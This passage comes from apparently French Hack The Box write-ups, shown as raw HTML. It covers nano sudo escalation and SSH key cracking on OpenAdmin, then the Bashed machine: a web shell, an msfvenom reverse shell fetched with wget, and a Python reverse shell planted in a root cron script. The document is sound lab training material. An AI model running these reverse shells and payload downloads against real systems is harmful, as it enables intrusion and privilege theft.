class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">joanna@openadmin:~$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> joanna on openadmin: </span></span><span class="line"><span class="cl"> <span class="nv">env_keep</span><span class="o">+=</span><span class="s2">&#34;LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET&#34;</span>, <span class="nv">env_keep</span><span class="o">+=</span><span class="s2">&#34;XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin, mail_badpass </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User joanna may run the following commands on openadmin: </span></span><span class="line"><span class="cl"> <span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: /bin/nano /opt/priv </span></span></code></pre></td></tr></table> </div> </div><h3 id="nano-as-root">nano as root </h3><p><a class="link" href="https://gtfobins.github.io/gtfobins/nano/" target="_blank" rel="noopener" >https://gtfobins.github.io/gtfobins/nano/</a></p> <p>Sur gtfobins, on cherche comment elever ses privilèges à l&rsquo;aide de nano. On trouve la commande suivante :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nano </span></span><span class="line"><span class="cl">^R^X </span></span><span class="line"><span class="cl">reset<span class="p">;</span> sh 1&gt;<span class="p">&amp;</span><span class="m">0</span> 2&gt;<span class="p">&amp;</span><span class="m">0</span> </span></span></code></pre></td></tr></table> </div> </div><p>On obtient ensuite un shell en tant que root :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1">## cd /root</span> </span></span><span class="line"><span class="cl"><span class="c1">## cat root.txt</span> </span></span><span class="line"><span class="cl">????????????? </span></span></code></pre></td></tr></table> </div> </div><h2 id="bonus-ssh2john-et-john-pour-cracker-le-mot-de-passe-de-joanna">BONUS: ssh2john et john pour cracker le mot de passe de joanna </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/OpenAdmin<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh2john old_joanna.pem </span></span><span class="line"><span class="cl">old_joanna.pem:<span class="nv">$sshng$1$16$2</span>AF25344B8391A25A9B318F3FD767D6D<span class="nv">$1200$906</span>d14608706c9ac6ea6342a692d9ed47a9b87044b94d72d5b61df25e68a5235991f8bac883f40b539c829550ea5937c69dfd2b4c589f8c910e4c9c030982541e51b4717013fafbe1e1db9d6331c83cca061cc7550c0f4dd98da46ec1c7f460e4a135b6f1f04bafaf66a08db17ecad8a60f25a1a095d4f94a530f9f0bf9222c6736a5f54f1ff93c6182af4ad8a407044eb16ae6cd2a10c92acffa6095441ed63215b6126ed62de25b2803233cc3ea533d56b72d15a71b291547983bf5bee5b0966710f2b4edf264f0909d6f4c0f9cb372f4bb323715d17d5ded5f83117233976199c6d86bfc28421e217ccd883e7f0eecbc6f227fdc8dff12ca87a61207803dd47ef1f2f6769773f9cb52ea7bb34f96019e00531fcc267255da737ca3af49c88f73ed5f44e2afda28287fc6926660b8fb0267557780e53b407255dcb44899115c568089254d40963c8511f3492efe938a620bde879c953e67cfb55dbbf347ddd677792544c3bb11eb0843928a34d53c3e94fed25bff744544a69bc80c4ffc87ffd4d5c3ef5fd01c8b4114cacde7681ea9556f22fc863d07a0f1e96e099e749416cca147add636eb24f5082f9224e2907e3464d71ae711cf8a3f21bd4476bf98c633ff1bbebffb42d24544298c918a7b14c501d2c43534b8428d34d500537f0197e75a4279bbe4e8d2acee3c1586a59b28671e406c0e178b4d29aaa7a478b0258bde6628a3de723520a66fb0b31f1ea5bf45b693f868d47c2d89692920e2898ccd89710c42227d31293d9dad740791453ec8ebfb26047ccca53e0a200e9112f345f5559f8ded2f193feedd8c1db6bd0fbfa5441aa773dd5c4a60defe92e1b7d79182af16472872ab3c222bdd2b5f941604b7de582b08ce3f6635d83f66e9b84e6fe9d3eafa166f9e62a4cdc993d42ed8c0ad5713205a9fc7e5bc87b2feeaffe05167a27b04975e9366fa254adf511ffd7d07bc1f5075d70b2a7db06f2224692566fb5e8890c6e39038787873f21c52ce14e1e70e60b8fca716feb5d0727ac1c355cf633226c993ca2f16b95c59b3cc31ac7f641335d80ff1ad3e672f88609ec5a4532986e0567e169094189dcc82d11d46bf73bc6c48a05f84982aa222b4c0e78b18cceb15345116e74f5fbc55d407ed9ba12559f57f37512998565a54fe77ea2a2224abbddea75a1b6da09ae3ac043b6161809b630174603f33195827d14d0ebd64c6e48e0d0346b469d664f89e2ef0e4c28b6a64acdd3a0edf8a61915a246feb25e8e69b3710916e494d5f482bf6ab65c675f73c39b2c2eecdca6709188c6f36b6331953e3f93e27c987a3743eaa71502c43a807d8f91cdc4dc33f48b852efdc8fcc2647f2e588ae368d69998348f0bfcfe6d65892aebb86351825c2aa45afc2e6869987849d70cec46ba951c864accfb8476d5643e7926942ddd8f0f32c296662ba659e999b0fb0bbfde7ba2834e5ec931d576e4333d6b5e8960e9de46d32daa5360ce3d0d6b864d3324401c4975485f1aef6ba618edb12d679b0e861fe5549249962d08d25dc2dde517b23cf9a76dcf482530c9a34762f97361dd95352de4c82263cfaa90796c2fa33dd5ce1d889a045d587ef18a5b940a2880e1c706541e2b523572a8836d513f6e688444af86e2ba9ad2ded540deadd9559eb56ac66fe021c3f88c2a1a484d62d602903793d10d </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/OpenAdmin<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ <span class="nb">echo</span> <span class="s1">&#39;old_joanna.pem:$sshng$1$16$2AF2......................1a484d62d602903793d10d&#39;</span> &gt; hash.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/OpenAdmin<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ john hash.txt --wordlist<span class="o">=</span>/usr/share/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">Using default input encoding: UTF-8 </span></span><span class="line"><span class="cl">Loaded <span class="m">1</span> password <span class="nb">hash</span> <span class="o">(</span>SSH, SSH private key <span class="o">[</span>RSA/DSA/EC/OPENSSH 32/64<span class="o">])</span> </span></span><span class="line"><span class="cl">Cost <span class="m">1</span> <span class="o">(</span>KDF/cipher <span class="o">[</span><span class="nv">0</span><span class="o">=</span>MD5/AES <span class="nv">1</span><span class="o">=</span>MD5/3DES <span class="nv">2</span><span class="o">=</span>Bcrypt/AES<span class="o">])</span> is <span class="m">0</span> <span class="k">for</span> all loaded hashes </span></span><span class="line"><span class="cl">Cost <span class="m">2</span> <span class="o">(</span>iteration count<span class="o">)</span> is <span class="m">1</span> <span class="k">for</span> all loaded hashes </span></span><span class="line"><span class="cl">Will run <span class="m">2</span> OpenMP threads </span></span><span class="line"><span class="cl">Press <span class="s1">&#39;q&#39;</span> or Ctrl-C to abort, almost any other key <span class="k">for</span> status </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">bloodninjas <span class="o">(</span>old_joanna.pem<span class="o">)</span> <span class="o">&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</span>&lt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">1g 0:00:00:04 DONE <span class="o">(</span>2025-01-20 08:36<span class="o">)</span> 0.2212g/s 2118Kp/s 2118Kc/s 2118KC/s bloodninjas..bloodmore23 </span></span><span class="line"><span class="cl">Use the <span class="s2">&#34;--show&#34;</span> option to display all of the cracked passwords reliably </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## On trouve le mot de passe bloodninjas de JOANNA</span> </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/bashed-htb/Mon, 13 Jan 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/bashed-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Bashed cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Bashed</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.68</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sS -sC -sV -An -p- 10.10.10.68 </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="m">80</span> -&gt; HTTP : http://bashed.htb </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="gobuster-found-dev-folder">gobuster: found dev/ folder </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ gobuster dir -u http://bashed.htb -t <span class="m">50</span> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Gobuster v3.6 </span></span><span class="line"><span class="cl">by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> <span class="p">&amp;</span> Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Url: http://bashed.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Method: GET </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Threads: <span class="m">50</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Negative Status codes: <span class="m">404</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> User Agent: gobuster/3.6 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Timeout: <span class="nv">10s</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Starting gobuster in directory enumeration <span class="nv">mode</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">/uploads <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 310<span class="o">]</span> <span class="o">[</span>--&gt; http://bashed.htb/uploads/<span class="o">]</span> </span></span><span class="line"><span class="cl">/php <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 306<span class="o">]</span> <span class="o">[</span>--&gt; http://bashed.htb/php/<span class="o">]</span> </span></span><span class="line"><span class="cl">/css <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 306<span class="o">]</span> <span class="o">[</span>--&gt; http://bashed.htb/css/<span class="o">]</span> </span></span><span class="line"><span class="cl">/dev <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 306<span class="o">]</span> <span class="o">[</span>--&gt; http://bashed.htb/dev/<span class="o">]</span> </span></span><span class="line"><span class="cl">/js <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 305<span class="o">]</span> <span class="o">[</span>--&gt; http://bashed.htb/js/<span class="o">]</span> </span></span><span class="line"><span class="cl">/fonts <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 308<span class="o">]</span> <span class="o">[</span>--&gt; http://bashed.htb/fonts/<span class="o">]</span> </span></span><span class="line"><span class="cl">/images <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 309<span class="o">]</span> <span class="o">[</span>--&gt; http://bashed.htb/images/<span class="o">]</span> </span></span><span class="line"><span class="cl">/server-status <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 298<span class="o">]</span> </span></span><span class="line"><span class="cl">Progress: <span class="m">220560</span> / <span class="m">220561</span> <span class="o">(</span>100.00%<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="nv">Finished</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="phpbashphp-www-data-and-arrexel-user">phpbash.php: www-data and arrexel user </h3><p>Dans le dossier dev/, on peut executer un script phpbash.php qui donne litteralement une session bash interactive en tant que www-data sur la machine :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">http://bashed.htb/dev/phpbash.php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www-data@bashed:/# <span class="nb">cd</span> home/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www-data@bashed:/home# ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">arrexel </span></span><span class="line"><span class="cl">scriptmanager </span></span><span class="line"><span class="cl">www-data@bashed:/home# <span class="nb">cd</span> arrexel </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www-data@bashed:/home/arrexel# ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">user.txt </span></span><span class="line"><span class="cl">www-data@bashed:/home/arrexel# cat user.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">aef2.....8071 </span></span></code></pre></td></tr></table> </div> </div><h3 id="users">Users </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat /etc/passwd <span class="p">|</span> grep bash </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">root:x:0:0:root:/root:/bin/bash </span></span><span class="line"><span class="cl">arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash </span></span><span class="line"><span class="cl">scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash </span></span></code></pre></td></tr></table> </div> </div><h3 id="reverse-shell--msfvenom">Reverse shell : msfvenom </h3><p>Avec msfvenom, pour s&rsquo;entrainer :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ msfvenom -p linux/x64/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.42 <span class="nv">LPORT</span><span class="o">=</span><span class="m">1337</span> -f elf -o test.elf </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> No platform was selected, choosing Msf::Module::Platform::Linux from the payload </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> No arch selected, selecting arch: x64 from the payload </span></span><span class="line"><span class="cl">No encoder specified, outputting raw payload </span></span><span class="line"><span class="cl">Payload size: <span class="m">74</span> bytes </span></span><span class="line"><span class="cl">Final size of elf file: <span class="m">194</span> bytes </span></span><span class="line"><span class="cl">Saved as: test.elf </span></span><span class="line"><span class="cl">$ python3 -m http.server <span class="m">8888</span> </span></span><span class="line"><span class="cl">Serving HTTP on 0.0.0.0 port <span class="m">8888</span> <span class="o">(</span>http://0.0.0.0:8888/<span class="o">)</span> ... </span></span><span class="line"><span class="cl">10.10.10.68 - - <span class="o">[</span>11/Jan/2025 19:11:27<span class="o">]</span> <span class="s2">&#34;GET /test.elf HTTP/1.1&#34;</span> <span class="m">200</span> - </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.42<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.68<span class="o">]</span> <span class="m">54598</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">python3 -c <span class="s2">&#34;import pty;pty.spawn(&#39;/bin/bash&#39;)&#34;</span> </span></span><span class="line"><span class="cl">www-data@bashed:/tmp$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">www-data@bashed:/tmp$ ^Z </span></span><span class="line"><span class="cl">zsh: suspended nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Bashed<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ stty raw -echo<span class="p">;</span> <span class="nb">fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>3<span class="o">]</span> continued nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www-data@bashed:/tmp$ whoami </span></span><span class="line"><span class="cl">www-data </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">--------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">wget 10.10.14.42:8888/test.elf </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">--2025-01-11 16:18:10-- http://10.10.14.42:8888/test.elf </span></span><span class="line"><span class="cl">Connecting to 10.10.14.42:8888... connected. </span></span><span class="line"><span class="cl">HTTP request sent, awaiting response... <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Length: <span class="m">194</span> <span class="o">[</span>application/octet-stream<span class="o">]</span> </span></span><span class="line"><span class="cl">Saving to: <span class="s1">&#39;test.elf&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">0K 100% 40.5M<span class="o">=</span>0s </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2025-01-11 16:18:10 <span class="o">(</span>40.5 MB/s<span class="o">)</span> - <span class="s1">&#39;test.elf&#39;</span> saved <span class="o">[</span>194/194<span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www-data@bashed:/tmp# chmod <span class="m">777</span> ./test.elf </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www-data@bashed:/tmp# ls -la test.elf </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-rwxrwxrwx <span class="m">1</span> www-data www-data <span class="m">194</span> Jan <span class="m">11</span> 16:10 test.elf </span></span><span class="line"><span class="cl">www-data@bashed:/tmp# ./test.elf <span class="p">&amp;</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="www-data---scriptmanager">www-data -&gt; scriptmanager </h2><h3 id="enumeration--sudo--l">Enumeration : sudo -l </h3><p>On découvre qu&rsquo;on peut executer n&rsquo;importe quelle commande, en tant que l&rsquo;utilisateur scriptmanager sans mot de passe !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@bashed:/home/arrexel$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> www-data on bashed: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, </span></span><span class="line"><span class="cl"> <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User www-data may run the following commands on bashed: </span></span><span class="line"><span class="cl"> <span class="o">(</span>scriptmanager : scriptmanager<span class="o">)</span> NOPASSWD: ALL </span></span></code></pre></td></tr></table> </div> </div><h3 id="shell-as-scriptmanager">shell as scriptmanager </h3><p>On ouvre donc un bash en tant que scriptmanager :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@bashed:/home/arrexel$ sudo -u scriptmanager /bin/bash </span></span><span class="line"><span class="cl">scriptmanager@bashed:/home/arrexel$ whoami </span></span><span class="line"><span class="cl">scriptmanager </span></span></code></pre></td></tr></table> </div> </div><h2 id="scriptmanager---root">scriptmanager -&gt; root </h2><h3 id="linpeas--scripts-folder">LinPEAS : /scripts folder </h3><p>Avec linpeas, on découvre un dossier suspect &ldquo;/scripts&rdquo; à la racine, créer par le user <code>scriptmanager</code>.</p> <p>On découvre qu&rsquo;il contient deux fichiers :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">scriptmanager@bashed:/scripts$ ls -l </span></span><span class="line"><span class="cl">total XX </span></span><span class="line"><span class="cl">-rw-r--r-- <span class="m">1</span> scriptmanager scriptmanager <span class="m">206</span> Jan <span class="m">12</span> 14:37 test.py </span></span><span class="line"><span class="cl">-rw-r--r-- <span class="m">1</span> root root <span class="m">12</span> Jan <span class="m">12</span> 13:25 test.txt </span></span></code></pre></td></tr></table> </div> </div><p>Dans test.py, on peut voir une commande qui ecrit dans un fichier test.txt une string &ldquo;hello&rdquo;. Ce fichier existe deja, donc le script a été executé auparavant. Comme le fichier semble avoir été crée par root, on déduit que root a executé ce script python. On suppose donc que ce fichier est potentiellement un script de test executé régulièrement par root, dans une crontab. On modifie donc le fichier test.py avec un reverse shell trouvé sur le site reverse shell generator : <a class="link" href="https://www.revshells.com/" target="_blank" rel="noopener" >https://www.revshells.com/</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">import socket,subprocess,os<span class="p">;</span><span class="nv">s</span><span class="o">=</span>socket.socket<span class="o">(</span>socket.AF_INET,socket.SOCK_STREAM<span class="o">)</span><span class="p">;</span>s.connect<span class="o">((</span><span class="s2">&#34;10.10.14.42&#34;</span>,6666<span class="o">))</span><span class="p">;</span>os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,0<span class="o">)</span><span class="p">;</span> os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,1<span class="o">)</span><span class="p">;</span>os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,2<span class="o">)</span><span class="p">;</span>import pty<span class="p">;</span> pty.spawn<span class="o">(</span><span class="s2">&#34;sh&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> 